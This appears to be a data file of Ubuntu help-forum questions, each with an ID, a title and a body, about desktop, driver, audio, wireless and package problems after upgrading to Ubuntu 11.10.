67444	tortoisehg does n't show up in nautilus context menu	i just installed ubuntu 11.10 on my netbook yesterday . i am having a problem getting tortoisehg working properly on it . i added the ppa for both tortoisehg and mercurial . i am able to install the software ( tortoisehg , tortoisehg-nautilus ) as i have done in past versions of ubuntu ( not 11.04 - i skipped that version ) . when i launch nautilus and navigate to one of my repositories i do n't see any context menu options for tortoisehg and i do n't see any overlay icons indicating the repository status . i know tortoisehg is installed because i can issue the thg command at a terminal and the workbench shows up . any ideas on how to get things working ?
67447	not a directory error when try to modify ~/.local/share/applications/	i want to add a working eclipse icon to the launcher but when i try to create a file `` eclipse.desktop '' under ~/.local/share/applications/ i get an error indicating that applications is not a directory . what may the reason be ? regards ... scrrenshot :
67451	pulseaudio does not recognize laptop microphone	i was trying to tune my guitar , when i 've decided to increase the microphone input volume . well , i went in the sound settings and it worked . also , in the connector options list , there was selected analog microphone/microphone 1 . well , i do n't know what happened with me , but i 've changed that to another option ( analog line-in ) , and seeing it does n't work ( obviously , the laptop microphone was the only one `` plugged-in '' ) , i tried to change it back . but when i 've done that , the connector option hopped automatically to something that is n't microphone , line-in , input or analog video , but no microphone , making it undetectable anymore . example : i choose analog video . i change input volume , it stays . i choose microphone . when i change input volume , it hops to analog video . can this error be fixed somehow ? update : here 's the information bse asked for : source # 0 state : suspended name : alsa_output.pci-0000_00_1f.5.analog-stereo.monitor description : monitor of internal audio analog stereo driver : module-alsa-card.c sample specification : s16le 2ch 44100hz channel map : front-left , front-right owner module : 4 mute : no volume : 0 : 100 % 1 : 100 % 0 : 0.00 db 1 : 0.00 db balance 0.00 base volume : 100 % 0.00 db monitor of sink : alsa_output.pci-0000_00_1f.5.analog-stereo latency : 0 usec , configured 0 usec flags : decibel_volume latency properties : device.description = `` monitor of internal audio analog stereo '' device.class = `` monitor '' alsa.card = `` 0 '' alsa.card_name = `` intel 82801db-ich4 '' alsa.long_card_name = `` intel 82801db-ich4 with ad1981b at irq 11 '' alsa.driver_name = `` snd_intel8x0 '' device.bus_path = `` pci-0000:00:1f.5 '' sysfs.path = `` /devices/pci0000:00/0000:00:1f.5/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 24c5 '' device.product.name = `` 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) ac'97 audio controller '' device.form_factor = `` internal '' device.string = `` 0 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' formats : pcm source # 1 state : suspended name : alsa_input.pci-0000_00_1f.5.analog-stereo description : internal audio analog stereo driver : module-alsa-card.c sample specification : s16le 2ch 44100hz channel map : front-left , front-right owner module : 4 mute : no volume : 0 : 77 % 1 : 77 % 0 : -6.80 db 1 : -6.80 db balance 0.00 base volume : 42 % -22.50 db monitor of sink : n/a latency : 0 usec , configured 0 usec flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` intel 82801db-ich4 '' alsa.id = `` intel ich '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` intel 82801db-ich4 '' alsa.long_card_name = `` intel 82801db-ich4 with ad1981b at irq 11 '' alsa.driver_name = `` snd_intel8x0 '' device.bus_path = `` pci-0000:00:1f.5 '' sysfs.path = `` /devices/pci0000:00/0000:00:1f.5/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 24c5 '' device.product.name = `` 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) ac'97 audio controller '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 65536 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analog stereo '' device.description = `` internal audio analog stereo '' alsa.mixer_name = `` analog devices ad1981b '' alsa.components = `` ac97a:41445374 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-input-microphone ; input-microphone-1 : analog microphone / microphone 1 ( priority . 8720 ) analog-input-microphone ; input-microphone-2 : analog microphone / microphone 2 ( priority . 8719 ) analog-input-linein : analog line-in ( priority . 8100 ) analog-input : analog input ( priority . 8000 ) analog-input-video : analog video ( priority . 7000 ) active port : analog-input-video formats : pcm
67453	how to fix overscanning with nvidia 9800 gt ? on live cd it was n't happening ?	as the title says , i 'm looking for a way to resolve it . in nvidia-settings i 've found the overscanning resizer , but the screen looks awful ! it was looking perfect on the live cd ! what should i do ? p.s . i 've got two driver versions : `` current '' and `` post-release '' . which is better ? what are the differences ?
67454	can not ping hostname - can ping ip and ssh	i have ubuntu server , i can ping ip of the machine , but ca n't hostname.local - maybe if i 've server up for 30-40mins hostname will become pingable . any ideas why ? thanks .
67455	is there a virtualbox indicator ?	is there any indicator that compatible with ubuntu 11.10 with unity ? i use it in ubuntu 11.04 .
67459	whats the diffrence between amd64 and x64 also whats alternate version ?	why there is no version listed as x86 at ubuntu download page ? also there are three subcategories a ) alternate b ) desktop c ) server whats this 'alternate '' version all about ? thanks .
67464	stuck on purple screen	i had just installed version 11.10 of ubuntu on my netbook . i have a intel gma 3150. the installation went well and there 's no problem when using the demo mode . after reboot when the installation finishes , the system wont boot even after trying both generic and recovery mode from the grub menu.however , i noticed that the hdd activity is still going on and i managed to get on to the login screen by putting the system to sleep mode and wake it up again but this is extremely inconvenient . after much effort of trying such as uncommenting grub_terminal=terminal and grub_gfxmode update intel graphics driver to latest , uninstall lightdm and uses gdm , disable plymouth , all the effort failed . the only thing work is nosetmode and i915.setmode=1 xforcevesa in the grub setting . i managed to boot straight in , but graphics acceleration , splash screen is lost . my default screen resolution which is 1024x600 changes to 1024x768 and i cant change it back . tried fresh installation for 5 times but problem still persist . can anyone help me please ?
67467	my second usb wireless card not working	after upgrading to 11.10 my realtek usb wireless card not working on my 2 laptops . ( one laptop acer & 32 bit ubuntu 11.10 other laptop 64 bit asus ) i ca n't create ad hoc connection . wlan1 not appear .
67471	is something eating up my home partition ?	since i 've updated to 11.10 , my home partition keeps filling itself up to full , but i have no idea what it is that is doing it . i 've managed to remove about 28gb ( 35gb capacity on the partition ) but it keeps getting full without me even doing anything ! this is causing me issues as i can not listen to any music , or even log back into my system if i log out again . i get no warnings from ubuntu that the partition is getting full , so my system suddenly becomes sluggish . the disk usage analyser does n't give anyway anything suspicious that 's sticking out to me that 's climbing in disk usage . edit : after running the command du -sch $ home/ . [ a-z ] * i 've just noticed a rather large file ... 26g /home/tom/.xsession-errors surely this should n't be that large ! edit 2 : i did cat .xsession-errors | less on the file , and it 's filled with lines like this : 11:15:10.436 i [ fsevents:287 ] got event 2 with cookie 0 on 1748 : /home/tom//.xsession-errors 11:15:10.436 i [ fsevents:287 ] got event 2 with cookie 0 on 1748 : /home/tom//.xsession-errors 11:15:10.436 i [ fsevents:287 ] got event 2 with cookie 0 on 1748 : /home/tom//.xsession-errors 11:15:10.436 i [ fsevents:287 ] got event 2 with cookie 0 on 1748 : /home/tom//.xsession-errors 11:15:10.436 i [ fsevents:287 ] got event 2 with cookie 0 on 1748 : /home/tom//.xsession-errors 11:15:10.436 i [ fsevents:287 ] got event 2 with cookie 0 on 1748 : /home/tom//.xsession-errors 11:15:10.436 i [ fsevents:287 ] got event 2 with cookie 0 on 1748 : /home/tom//.xsession-errors 11:15:10.436 i [ fsevents:287 ] got event 2 with cookie 0 on 1748 : /home/tom//.xsession-errors 11:15:10.437 i [ fsevents:287 ] got event 2 with cookie 0 on 1748 : /home/tom//.xsession-errors 11:15:10.437 i [ fsevents:287 ] got event 2 with cookie 0 on 1748 : /home/tom//.xsession-errors 11:15:10.437 i [ fsevents:287 ] got event 2 with cookie 0 on 1748 : /home/tom//.xsession-errors 11:15:10.437 i [ fsevents:287 ] got event 2 with cookie 0 on 1748 : /home/tom//.xsession-errors 11:15:10.437 i [ fsevents:287 ] got event 2 with cookie 0 on 1748 : /home/tom//.xsession-errors 11:15:10.437 i [ fsevents:287 ] got event 2 with cookie 0 on 1748 : /home/tom//.xsession-errors 11:15:10.437 i [ fsevents:287 ] got event 2 with cookie 0 on 1748 : /home/tom//.xsession-errors 11:15:10.437 i [ fsevents:287 ] got event 2 with cookie 0 on 1748 : /home/tom//.xsession-errors edit 3 : issue seems to be with the spotify native client writing to the .xsession-errors file . i 've reported the bug here : http : //getsatisfaction.com/spotify/topics/spotify_is_writing_an_obscene_amount_of_information_to_error_file
67473	aptdaemon error : can not install any packages	i 'm trying to install packages and i get this error : there seems to be a programming error in aptdaemon , the software that allows you to install/remove software and to perform other package management related tasks . and the details : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 968 , in silmulate trans.unauthenticated = self._simulate_helper ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1092 , in _simulate_helper return depends , self._cache.required_download , \ file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 235 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : i was n't able to locate a file for the ttf-mscorefonts-installer package . this might mean you need to manually fix this package . how do i resolve this error ?
67474	can not 'enable mobile broadband ' even after checking it	is the network manager in oneiric different from natty ? how can i get the old one back ? or is it the problem with some packages ? i used to connect to internet using my mobile broadband device using one click . now i 've to remove , replug , restart atleast 10 times to connect it . since you 've asked , i 'm using natty and oneiric with the same /home partition with the same username . so , it 's a fresh install of oneiric not an upgrade . the same problem appeared with the live cd and while installing oneiric . also , even after i enable mobile broadband ( below enable networking , wireless ) , when i click on the mobile connection and it tries to connect , it displays as 'not enabled ' .
67480	how do i get the window jelly effect ?	i had ubuntu before and there was an awesome option that allowed me to get a window `` jelly '' effect , however after reinstalling ubuntu 6 months later i find that the system settings is less comprehensive and lacks my favorite `` jelly '' option . any way to get it back ?
67481	how do i get the new toolbar style in my pygtk app ?	i 've noticed that i still have the old school gnome2 gtktoolbar style when i just run a simple glade/gtk application : it should look like this : this is gtk 3.20 , new widgets like gtkswitch , gtkinfobar , and gtklockbutton work fine . what do i have to do to get the new style toolbars ?
67490	how to install 11.10 besides an existing os ?	tried to install 11.10 besides my existing 10.04 and mint 11 , but it did not give me the option to install it as second os on a separate partition , only could select 'erase all systems ' . how can i install 11.10 besides my two systems ?
67493	ignoring forcefully installed package ?	so i installed the good , old amarok14 package on ubuntu 11.10 ( because there still is n't a music player that is as good as this age old player ) however : i had to install it using dpkg , making it ignoring the libmtp8 package ( using -- ignore-depends=libmtp8 ) . it runs beautifully , but whenever i want to install anything else ( using apt-get , aptitude , synaptic , ... ) it always wants me to remove amarok14 first . what can i do about this ?
67495	getting dual monitors to work on 11.10	i have two portrait mode monitors ( the same model but one plugged in digitally , one analog ) . both worked fine ( as one big visual space ) when i was on maverick meerkat . when i installed 11.10 i only see one monitor working and it happens to be the digital one . in gksu nvidia-settings i do not see any way to enable the other monitor . in settings/displays only one monitor is shown and it is called `` unknown '' , the `` detect '' button does nothing when clicked , the mirror setting is greyed out , and the orientation is `` normal '' and clicking it does not offer any other choices such as `` portrait '' . the motherboard is a gigabyte ga ma 770 ud3 .
67498	how do i stop my emachines e443 system from freezing either at the login screen or right after i get in ?	major update : i am no longer using ubuntu with wubi , because i like having only one os on a pc at a time . but , it is running smoothly in virtualbox 4.1.14 , so i 'm ok with 12.04 now . thanks for trying to resolve the issue ! i have an emachines e443 laptop in which i used the wubi installer to put 11.10 on my disk . every time i try to log in , it just freezes before i even see my wallpaper . either that , or right before i get to type my password . please help , as i want to use the new ubuntu ! edit : i have uninstalled ubuntu using add/remove programs . hoping for the best results on the reinstall ! ; ) edit 2 : it works ! edit 3 : okay , broken again . for some reason , it only happens on the second boot of the install .
67500	how to disable notification from network-manager	can i disable all libnotify related notification from network manager ? 'edit connection ' dialog does n't help out
67501	new windows covered by top panel	after update from 11.04 to 11.10 i experience a disturbing bug : new windows are always positioned at the top of the screen behind the top panel instead of being aligned to the bottom of the panel . it could seem to be a minor bug , but it is really disturbing to hunt the window panel anytime i want move the window . is there any quick fix/settings available ? thanks ps : i wanted to attach screenshots , but the system do n't let me .
67504	unity launcher does n't respond to mouse at the left side when the applications are fullscreen	i , ve just installed 11.10 and i have this problem that sometimes launcher does n't respond to mouse and it does not reveal . when i do unity -- replace in terminal nothing happens , it just set the display initial variable to :0 and then unity is gone . i should restart lightdm after to restore the unity .
67505	keybord does n't work in nautilus ( and gnome-terminal ) after ubuntu update from 11.04 to 11.10	when i open any folder , window of nautilus appears , and i ca n't use keybord keys ( i 've tried tab , f2 , f3 , f9 , ctrl+l , arrows , del ) , except alt+f4 . and in gnome-terminal i ca n't type at all . i tried to open it using : ctrl+alt+t and alt+f2 gnome-terminal , terminal opens but keybord in terminal does n't work , even ctrl+d , alt+f4 works .
67507	freezing at login on a toshiba satellite c655d	ubuntu always freezes at the login screen . i had the opportunity to login only twice since installed . i 'm using a toshiba satellite c655d , with an amd e-240 1.5 ghz 64x processor and ubuntu 11.10 amd64 . i am a newbie to ubuntu so i do n't know what to do . clarification : i 'm not able to choose fallback mode because the system freezes once the login screen appears .
67513	how to disable f10 opening indicator-datetime ?	when i press f10 , the indicator datetime opens up . how can i disable that ? another app use that as a keyboard short cut and i ca n't use it ! using ubuntu 11.04 unity i do n't see f10 listed in my keyboard shortcuts too
67514	i 've lost everything on my desktop ?	i 'm an uneducated ubuntu user , i updated to 11.10 and while i was changing some settings in compiz and i lost all of my desktop icons ... well everything except for-file , edit , view , bookmarks , go and help ! i have no idea how to resolve the problem , please help me ! ! is there a way to fix the problem in the terminal or open the control centre from terminal ? thanks
67518	how to disable window move with alt + left mouse button ?	i have problem with this function because i work in maya and other 3d applications that use this key combination ... this option on ubuntu 11.04 was in `` window '' section so i could change it to something else to avoid conflicts ... where is this located in ubuntu 11.10 ?
67521	how do i switch from 11.10 back to 10.10 ?	o.o . is giving me problems . i want to switch back to maverick meerkat . should i use my dvd from a year ago or will there be fewer problems if i download it now and make an new dvd . i guess i think a newer version of maverick might have fewer problems than last year 's disk of maverick . of course , if they freeze it and never update drivers , etcetera , then i guess not .
67522	closing thunderbird to messaging menu	i would like to switch to using thunderbird to read my email . however , i can not work out a way to minimise/close thunderbird to the messaging menu ( thus avoiding having it cluttering up the unity panel . i have tried using extensions such as firetray , but in oneiric none of these produce satisfactory results . any suggestions ?
67538	how to enable unity 3d on an nvidia quadro 1000m	i 'm running ubuntu 11.10 on my laptop , which has a nvidia quadro 1000m graphics card . at login , i chose the 3d version of ubuntu , but somehow my laptop does n't support this and switches to unity 2d automatically . i think i might have a problem with my drivers . is there a way to make unity 3d work on my laptop ? when i try to run the unity_support_test test , i get : xlib : extension `` glx '' missing on display `` :0 '' . error : unable to create the opengl context
67543	missing launcher , top panel without icons , an ati driver problem ?	after upgrading to ubuntu 11.10 , the following problems occurs when accesing in ubuntu mode ( 3d ) : the launcher is missing , top panel without icons on the right side , and i can only restart with terminal ( alt-t and then sudo reboot ) . no problems in 2d . it occurs on my pc with amd athlon ( tm ) ii x4 640 processor , radeon hd5670 and both with the 32-bit and 64 bits versions of ubuntu . both versions work well on an older pc with amd athlon 64 x2 dual core 4200 + processor , and an nvidia integrated graphics card ( c61 geforce 6150se nforce 430 ) . could it be a problem with the ati driver ?
67544	what are hidden files ending with ~ ?	i noticed while working on my site through nano/terminal that ubuntu creates weird ~ files . i 've index.php~ etc . i imagine this are backup files ? is this correct ? why does it do this ? and how do i get rid of this functionality ?
67546	software center shows the name of the software in a list , but install button does not work	two days ago i performed a clean installation of oneiric ocelot on my acer extensa 4620 . after installation i updated it first . then i tried to install some other software packages like gimp , chrome , pychess etc . but software center acted strangely . it shows the name of software in the list but its install button does not work . can any one help me get out of this mess ? thanks : )
67551	setting editor for crontab -e , why always using basic vim ?	when issuing crontab -e as root , i always got messages like the following ( partial ) , however , executing vim directly does n't have problems at all . $ editor was set to vim in /root/.bash_profile already . % > sudo crontab -e error detected while processing /root/.vimrc : line 2 : e319 : sorry , the command is not available in this version : autocmd ! bufnewfile * silent ! 0r ~/.vim/skel/tmpl. % : e line 20 : e319 : sorry , the command is not available in this version : autocmd vimenter * set vb t_vb= line 57 : e518 : unknown option : autochdir line 65 : e319 : sorry , the command is not available in this version : syn on line 78 : e538 : no mouse support : mouse=a line 79 : e319 : sorry , the command is not available in this version : filetype plugin indent on line 87 : e319 : sorry , the command is not available in this version : funct ! commentblock ( comment ) line 88 :
67553	add themes in ubuntu 11.10	i just installed ubuntu 11.10 and it seems there 's only 4 themes i can choose from . do i have to install another program to handle themes , or is there another way ?
67555	what is the most ms word-compatible word processor available ?	i have to write a dissertation for my university . i have to respect various format guidelines , and my professor uses ms word on his workstation . in my experience , libreoffice has been faulty when it comes to ms word compatibility , with many incorrect parameters ( happened earlier this month ) . i ca n't afford a ms office licence to install it in wine , so i 'd like to know if there are any alternatives for linux .
67563	i try to install tweetdeck , but nothing happens	following the instruction from http : //www.pablo-bloggt.de/linux/twitter-programm-fur-ubuntu-tweetdeck/ , i go directly to http : //www.tweetdeck.com/desktop/ . but when i press the 'download now'-button , it 's label changes to 'tweetdeck wird installiert ' but nothing else happens . edit : i found this which explains that i have to look for alternatives to adobe air .
67566	serious error while trying to mount partition xxx ignore skip mounting manual recovery	yesterday i upgraded from natty to oneiric and i got a `` serious error while trying to mount partition /media/xxx . it is an ntfs partition . i chose skip , i checked the partition with disk utility while says `` file system is not clean '' . i booted in windows and checked the partition which did not find any errors . next , i did a backup , i reformatted the partition and recopied all my files , edited fstab with the new uuid . same error on boot . again windows says there are not problems . is this a problem with ntfs handling in oneiric ? i 'm tempted to remove partition checking from fstab since it seems i 'm getting false warnings . help please .
67567	extension `` glx '' missing on display	when i try to confirm than i can run unity 3d on my asus u31sd with intel 's i5 sandy brigde and nvidia 520 and nvidia optimus i receive this error : xlib : extension `` glx '' missing on display `` :0 '' . of course , i can not run any of the effects of ubuntu 11.10 , not even the simple app switcher . can anybody help me ? thank you
67577	nvidia gt 525m no screen found	i 'm a dell xps user with nvidia gt 525m with optimus . when i installed nvidia i was greeted with blank screen . and the error in nvidia log was `` fatal error : no screen found '' . so after searching for the solutions i figured that i have to insert `` busid '' in xorg.conf file . after rebooting i was again greeted with blank screen with error `` fatal error : screen already occupied '' . i do n't what exactly the problem is . do i need to blacklist intel inbuilt graphics to nvidia in my machine or anything else needs to be done ? please guide me .
67579	oil rush from software center on other platforms	i bought oil rush from the ubuntu software center not to long ago and i love the game . the thing is i also want to be able to play the game on my windows box or my other linux boxes not running ubuntu . is there anyway i can download the versions for other platforms as if i had bought it at their store ?
67580	how to shrink the user menu ?	i am running gnome-session-fallback and i want my panel to have a height of 24 pixel , that can be easily configured , except for one problem maker , the user menu : unlike all other applets , the user menu has a minimum size of around 30 pixel , which make the panel to ignore my 24 pixel setting and forces it to 30 pixel . how can i either shrink the user menu or get back the old system menu , so that i do n't need the user menu ? i already tried to change the icons ( i.e . user-available-symbolic.svg , ... ) , but even without the icons the thing stays up at 30px .
67582	ca n't get hamster and getting things gnome integrate	i 'm on a 11.10 x64 machine . when i open a task in gtg , hamaster did n't automatically add if i do n't do it manully . hamster can read the titles and tags of my tasks . but when i finish a task in gtg , hamster did n't stop tracking it . i 've add the gtg-daily ppa but nothing works . btw , i also added the ppa albertomilone/hamster-indicator for the hamsrer-indicator . can someone help me ?
67587	my wifi in ubuntu 11.10 so slow	how could i repair ? i update ubuntu 11.04 to ubuntu 11.10 , im new user , help me thanks
67589	broadcom bcm4313 wireless does n't work	i am not able to run wifi on ubuntu 11.10
67591	upgrade to 11.10 fails on flash	i tried to upgrade from 11.04 to 11.10 this morning and the upgrade failed . first , it reported a flash error and then at the very end it aborted the upgrade due to these same flash errors . i have read the flash failure was due to my running in wireless mode . the questions are : do i need to restore back to 11.04 and how do i do that ? or , should i just wait for some kind of update from ubuntu to resolve any issues that may have resulted ? 11.10 seems to be running fine , but without flash and who knows what else .
67592	simplescan -- fix-pdf fails with a segmentation fault	i 'm attempting to use the new -- fix-pdf option of simple scan to fix the errors in pdf files created by earlier versions of simple scan . the command : simple-scan -- fix-pdf test.pdf results in a segmentation fault . has anyone successfully used the -- fix-pdf option ?
67593	make gedit embedded terminal colours the same as the default terminal	i 've just updated to 11.10 and now my embedded terminal in gedit does not match my default terminal . i hate looking at a white and black terminal . does anyone know how to make the embedded terminal match the default terminal ? this is a screenshot : i want my embedded terminal in gedit to match my default terminal .
67594	unable to repair packages in ubuntu software center	when i open up the software center it gives me , `` items can not be installed or removed until package catalog is repaired '' . can someone help me ?
67595	canon pixma ip1600 stopped working when upgrading to 11.10	i had my canon pixma ip1600 printer working well in ubuntu 11.04 ( i followed what was wrote here to accomplish that ) . then i upgraded my ubuntu to version 11.10 but the upgrade went wrong and i was forced to reinstall ubuntu 11.10 from scratch . after that , i tried to install my printer just as i did before but i was not able to print with success anymore . i reinstalled ubuntu 11.10 a second time , this time without encrypting my home folder and i was able to print successfully . to take any doubts i reinstalled ubuntu 11.10 a third time and again i could not print anything . so , can someone help me to put my printer working in ubuntu 11.10 with my home folder encrypted ? thanks in advance .
67596	can i replace 'dash home ' with a list of applications	i do n't really need a search driven application menu - particularly with a 'null ' front page offering me email and web browser . can i just hook in a simple application menu here in any way ? ( giving the effect of going straight to 'more apps ' ) ? one of the comments below links to a list of alternative supported desktop environments - what different de 's / shells are available ? which i think may be very relevant , but having been bitten before by ubuntu changing their preferences ( media player , photo manager ) i 'm keen to see if there are any ways to improve the customisation of the current flavour-of-the-month desktop .
67598	why ca n't i telnet to mysql ?	when trying to connect to mysql server via telnet i am getting following error : telnet localhost 3306 trying : :1 ... trying 127.0.0.1 ... telnet : unable to connect to remote host : connection timed out i tried telnet with 127.0.0.1 , hostname also , but getting same error message . but i can connect with mysql -u username -p once i am in the server . here is the result of netstat : netstat -na | grep mysql unix 2 [ acc ] stream listening 4540495 /var/run/mysqld/mysqld.sock unix 3 [ ] stream connected 4542200 /var/run/mysqld/mysqld.sock netstat -na | grep 3306 tcp 0 0 0.0.0.0:3306 0.0.0.0 : * listen what could be possible problems ? if you need some more details i could provide it without any problems . thanks a lot .
67599	booting into text mode - how can i fix it ?	i upgrade my ubuntu to 11.10 . i restarted and it worked perfectly until now when i restarted again and it is now in text mode after i login . can somebody please provided some suggestions on what i should do ? i do not understand what happened . i tried restarting lightdm but it is already running .
67600	wireless drivers on install ?	i 've been having this question since ubuntu 9.xx , hopefully you guys know what i can do . is it possible to make it detect the wireless drivers on installation ( 11.10 ) ? i currently have a desktop with a wireless adapter and it 's annoying having to unplug it , get it 2 floors below where the actual modem is , connect it directly and install everything . there should be a more efficient way to do this right ? i do n't know why ubuntu does n't do this by default it 'd be a nice feature specially for laptops i think . thanks in advance ! edit : my wireless card is broadcom corporation bcm4318 [ airforce one ] 802.11g wireless lan controller ( rev 02 )
67601	external drives & mobile phone open f spot , not the file manager .	when i click on unity icon for external drive or mobile phone , f spot is used as default which shows nothing . how do i get the icons to open the file manager instead , which is what used to happen on 11.04 ?
67615	how do i enable the touchpad on a macbookpro8,1 ?	i installed ubuntu 11.10 in macbookpro8,1 . i ca n't enable touchpad , how to enable ?
67619	install gnome without working internet connection	i switched to xfce from gnome , and then i deleted gnome . now that i have restarted my computer , xfce will not start . i have tried re-installing gnome using apt-get , but i am unable to connect to my wireless connection from the command line . i have another computer ( which is running windows ) , so i would like to know if there is some way i can download gnome on that computer , put it on a flash drive , and then install it from my flash drive .
67622	performance is crucially slow and very lagging	linux ubuntu 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:50:42 utc 2011 i686 athlon i386 gnu/linux hardware config is amd athlon processor and 500 gb harddisk with 2gb ram this is my system config . and after upgrading to 11.10 using update manager , i really find hard time in performance overall in using applications . the mouse is moving poor and the system is giving me so many lack in my work . the compiz s up and running . even my chrome application is taking long time and my graphics is very very poor.. i never felt the same evr with my lovely ubuntu.. and one crucial information is , its taking 20 seconds to open my gedit : ( please help me
67626	command at startup or login	i would like to run the following command after every boot ( or login ) . echo off > /sys/kernel/debug/vgaswitcheroo/switch it turns off my discrete gpu . to what script should i add this command . i would appreciate any help .
67629	how can i install my canon pixma mp210 ?	i could install it on 11.04 by selecting mp220 driver , but on 11.10 y ca n't select drivers .
67636	ca n't install certain drivers	i got a problem with my drivers installation . 3 days ago , i installed ubuntu with windows 7 's installation program ( wubi ) . then they asked me to activate or install the drivers , i said yes and everything worked perfectly fine . then i saw i had low disk space on ubuntu , so i decided to reinstall it with different partitions for swap , root , and home . now it asks me to activate the drivers ( ati/amd proprietary fglrx graphics driver ( post-release updates ) and ati/amd proprietary fglrx graphics driver ) . i say yes . and it returns this : sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log i uploaded the log here . how do i install the drivers ? version : ubuntu 11.10 64-bit , installed through usb .
67637	is it safe to install the nvidia-current driver and then have this hdd in another pc that has nvidia graphics	my pc has nvidia chipset + nvidia graphic card . both built in and removable . the second pc , in which this hdd will be installed has just a nvidia chipset with integrated graphics . i 'm not sure if my pc specs are the same as the other one . so , if i install it here will it still work there ?
67638	wireless internet extremely slow on a tp-link tl-wn821n	after i updated from 11.04 to 11.10 the internet barely works . loading a webpage can take minutes and thats even if it works in the first place . i have now idea if this is a bug and if it is how am i supposed to update ? the internet doesnt work and just crashes ! please help . wireless card : tp-link tl-wn821n 00:00.0 host bridge [ 0600 ] : intel corporation 82945g/gz/p/pl memory controller hub [ 8086:2770 ] ( rev 02 ) 00:01.0 pci bridge [ 0604 ] : intel corporation 82945g/gz/p/pl pci express root port [ 8086:2771 ] ( rev 02 ) 00:1b.0 audio device [ 0403 ] : intel corporation n10/ich 7 family high definition audio controller [ 8086:27d8 ] ( rev 01 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 1 [ 8086:27c8 ] ( rev 01 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 2 [ 8086:27c9 ] ( rev 01 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 3 [ 8086:27ca ] ( rev 01 ) 00:1d.3 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb uhci controller # 4 [ 8086:27cb ] ( rev 01 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation n10/ich 7 family usb2 ehci controller [ 8086:27cc ] ( rev 01 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 pci bridge [ 8086:244e ] ( rev e1 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801gh ( ich7dh ) lpc interface bridge [ 8086:27b0 ] ( rev 01 ) 00:1f.1 ide interface [ 0101 ] : intel corporation 82801g ( ich7 family ) ide controller [ 8086:27df ] ( rev 01 ) 00:1f.2 ide interface [ 0101 ] : intel corporation n10/ich7 family sata ide controller [ 8086:27c0 ] ( rev 01 ) 00:1f.3 smbus [ 0c05 ] : intel corporation n10/ich 7 family smbus controller [ 8086:27da ] ( rev 01 ) 01:00.0 vga compatible controller [ 0300 ] : ati technologies inc rv790 [ radeon hd 4890 ] [ 1002:9460 ] 01:00.1 audio device [ 0403 ] : ati technologies inc hd48x0 audio [ 1002 : aa30 ] 02:01.0 firewire ( ieee 1394 ) [ 0c00 ] : agere systems fw322/323 [ 11c1:5811 ] ( rev 70 ) 02:05.0 multimedia video controller [ 0400 ] : conexant systems , inc. cx23418 single-chip mpeg-2 encoder with integrated analog video/broadcast audio decoder [ 14f1:5b7a ] 02:08.0 ethernet controller [ 0200 ] : intel corporation n10/ich 7 family lan controller [ 8086:27dc ] ( rev 01 )
67639	ca n't link against opengl anymore	after updating to 11.10 i ca n't link code against libgl/glut . freeglut3-dev etc . are installed and it looks like they can be found too . i 'm really not sure what 's going on . makefile gltest : gltest.cc gcc -wall -lglut -lglu -lgl gltest.cc -o gltest gltest.cc # include < gl/glut.h > int main ( int argc , char **argv ) { glutinit ( & argc , argv ) ; glutinitdisplaymode ( glut_depth | glut_double | glut_rgba ) ; glutinitwindowposition ( 100,100 ) ; //glutinitwindowsizendowsize ( 320,320 ) ; glutcreatewindow ( `` test '' ) ; return 1 ; } output jonas @ fortress : ~/dev/checkouts/test $ make gcc -wall -lglut -lglu -lgl gltest.cc -o gltest /tmp/cct1hevy.o : in function `main ' : gltest.cc : ( .text+0x1e ) : undefined reference to `glutinit' gltest.cc : ( .text+0x28 ) : undefined reference to `glutinitdisplaymode' gltest.cc : ( .text+0x37 ) : undefined reference to `glutinitwindowposition' gltest.cc : ( .text+0x41 ) : undefined reference to `glutcreatewindow' collect2 : ld returned 1 exit status make : *** [ gltest ] error 1 when linking with -- verbose attempt to open /usr/lib/gcc/x86_64-linux-gnu/4.6.1/../../../../lib/libglut.so succeeded and then when checking the symbols in that file $ readelf -ws /usr/lib/gcc/x86_64-linux-gnu/4.6.1/../../../../lib/libglut.so|grep glutinit 278 : 000000000001dfc0 1581 func global default 11 glutinit i 'm very confused now .
67642	maximum cpu frequency on boot	how can i make the cpus run at maximum frequency on startup/boot ? is there a script i can make or something ?
67653	tiling window management with unity	edit : xmonad can be made to play well with unity : http : //markhansen.co.nz/xmonad-ubuntu-oneiric/ ( thanks hvr ) i 'm looking for a tiling window manager to use with unity . i would like the manager to place all the windows for me , as xmonad does , though i get the impression xmonad does n't play well with unity . unity does have some tiling features ( you can use keyboard shortcuts to eg send a window to the left half of the screen ) , but this is still lacking compared to what i want , as i want the manager to choose where to place windows on my behalf . any ideas ? thanks !
